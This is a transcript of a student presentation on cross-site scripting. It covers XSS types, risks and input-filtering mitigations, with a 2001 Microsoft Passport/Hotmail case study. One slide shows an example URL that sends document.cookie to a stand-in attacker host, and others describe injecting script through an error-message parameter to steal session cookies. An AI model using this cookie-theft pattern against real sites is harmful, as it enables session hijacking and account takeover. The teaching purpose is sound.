Cross Site Scripting XSS - PowerPoint PPT Presentation

1 / 27
About This Presentation
Title:

Cross Site Scripting XSS

Description:

Cross Site Scripting on Hotmail. How it should work: ... However, when a user goes to an MSN site from a non-trusted email the ... – PowerPoint PPT presentation

Number of Views:624
Avg rating:3.0/5.0
Slides: 28
Provided by: culv
Category:
Tags: xss | cross | hotmail | msn | scripting | site

less

Transcript and Presenter's Notes

Title: Cross Site Scripting XSS


1
Cross Site Scripting (XSS)
  • Presented by Team SSL
  • Sam Jeyandran
  • Shain Bergman
  • Liz Neiderman

2
Learning objectives
  • Understand the definition of a cross-site
    scripting vulnerability
  • Know how they happen and why they are so hard to
    prevent
  • Get a hands-on perspective about cross-site
    scripting.
  • Learn some ways to prevent them

3
Cross-Site Scripting Outline
  • Survey of client-side scripting technologies
  • Definition
  • Risks
  • Types of XSS
  • Without storage
  • With storage
  • Case Study

4
What is Cross Site Scripting (XSS)
  • Cross site scripting (XSS) is a type of computer
    security exploit where information from one
    context, where it is not trusted, can be inserted
    into another context, where it is. From the
    trusted context, an attack can be launched.

5
Cross Site Scripting by Types
  • Non-persistent XSS malicious code is embedded on
    the page which is echoed immediately following
    the request.
  • Reflected
  • Persistent the malicious code is stored on the
    server for a later time.
  • DOM Based XSS
  • Klein 2005

6
Key Term
  • HTML hypertext markup language. HTML is parsed
    by your web browser after a web page is retrieved
    and consists of tags.

7
Non-Persistent / Reflected XSS
  • How significant is this?
  • Victim has to click on link only AFTER logging
    into the website.
  • The remote site can detect infected input.

8
What are the Threats
  • Software failure/error
  • Web application
  • Browser failures
  • Deliberate acts of espionage/trespass
  • unauthorized access, data collection

9
Examples of XSS attack
  • Web browsing attack
  • e-commerce websites
  • Software based that use browser rendering
  • E-mails
  • JavaScript
  • document.open(XSS vulnerable)

 
10
Reflected XSS
http//www.google.com/document.open(http
//www.attacker.org/page.htm?
document.cookie)
target site
Attacker
3
malicious code
normal interaction
reflected code
2
From Malicious User To Victim User CLICK HERE
NORMAL VALID SESSION security
context vulnerablesite.com
MALICIOUS CODE security context vulnerablesit
e.com
5
email client
2) browser window
1) browser window
11
Stored XSS
  • You think that you interact with site Z
  • Site Z has been poisoned by attacker (Samy)
  • The "poison" (e.g., JavaScript) is sent to you,
    along with legitimate content, and executes. It
    can exploit browser vulnerabilities, or contact
    site S and steal your cookies, usernames and
    passwords...

Poison
Samy
Z
Surfing
Poison
S
Hostile Code Executes
Modified from Korbin, 2005
12
Mitigation Validation
  • Validation of Input
  • Use of regular expressions
  • Algorithms
  • () signifies HTML codes
  • lt and gt

13
XSS Mitigation Techniques
  • BlackListing Remove from user input all
    characters that are meaningful in scripting
    languages
  • "'()
  • You must do this filtering on the server side
  • You cannot do this filtering using Javascript on
    the client, because the attacker can get around
    such filtering
  • Whitelisting define characters that are ok
    (alpha and numeric), and filter everything else
    out. -- your best bet

14
What are the Threats
  • Software failure/error
  • Web application
  • Browser failures
  • Deliberate acts of espionage/trespass
  • unauthorized access, data collection

15
XSS Risks
  • Stealing of services and account credentials
  • Un-trusted information from a trusted site
  • Denial of service
  • Exploitation of web browser

16
XSS Risks- Stolen Credentials
  • Credentials could be stolen and used by the
    attacker
  • Web site requires authentication needs technology
    solution (Passwords)
  • Cookies are used to store credentials

17
XSS Risks - Misinformation
  • Scripts can spy on what you do
  • History of sites visited
  • Track information you posted to a web site
  • Scripts can misinform
  • Modify the web page
  • Modify the content

18
XSS Risk - DoS
  • Malicious scripts can make your web site
    inaccessible
  • Make browsers crash or become inoperable
  • Redirect browsers to other web sites

19
Case Study Microsoft Passport
  • Information found on
  • http//eyeonsecurity.net/
  • The exploit explained is from 2001. We are only
    using it as an example of XSS Microsoft has
    since dealt with this vulnerablity.

20
A single name, password and wallet for the web
  • The attack on Microsoft Passport is particularly
    dangerous to users because the same
    authentication method allows you to access many
    different programs.
  • This is an example of security vs. access. One
    authentication method is nice, but it comes with
    the cost of security issues.

21
Cross Site Scripting on HotmailHow it should
work
  • When a user clicks on a non-trusted link, the
    credentials should not be sent to the non-trusted
    website.
  • However, when a user goes to an MSN site from a
    non-trusted email the credentials get sent to the
    Passport site. This is where exploits have been
    achieved.

22
How this is done
  • This exploit is an example of a JavaScript
    attack.
  • It is performed through a vulnerability in a
    flawed ASP script on an MS Passport site
    ErrorMsg.asp. This allows different scripts
    display error messages in HTML. The problem is
    that a cracker can insert his own script.

23
Implementation
  • ErrMsg will usually be filled in with something
    like User is not authenticated. Now what if it
    is filled with This should be bold.
  • http//auctions.msn.com/Scripts/ErrorMsg.asp?Sourc
    eOErrMsgThis20should20be20bold
  • If no filtering is done for JavaScript, we can
    very easily inject our own JavaScript code to
    retrieve the session cookie stored in the Hotmail
    users browser.

24
Implementation (continued)
  • Without any filtering we would just pass the
    following url and expect a message box to appear
    with the MSN cookies
  • http//auctions.msn.com/Scripts/ErrorMsg.asp?Sourc
    eOErrMsgookie)'
  • To complete the exploit the malicious user has to
    send a URL, which actually passes the Cookie to a
    3rd party CGI script instead of displaying them
    to the Hotmail user in a Message box. The
    exploiting e-mail page could look very similar to
    the one below.

25
(No Transcript)
26
Summary
  • Security officials should be aware of this
    exploit because XSS is a large threat to an
    organization.
  • Despite being a new exploit there are some tools
    out to detect XSS like Acunetix Web Vulnerability
    Scanner

27
Thank You!
  • Any Questions or Comments
Write a Comment
User Comments (0)
About PowerShow.com
Home About Us Terms and Conditions Privacy Policy Presentation Removal Request Contact Us
Copyright 2024 CrystalGraphics, Inc. — All rights Reserved. PowerShow.com is a trademark of CrystalGraphics, Inc.
The PowerPoint PPT presentation: "Cross Site Scripting XSS" is the property of its rightful owner.
Do you have PowerPoint slides to share? If so, share your PPT presentation slides online with PowerShow.com. It's FREE!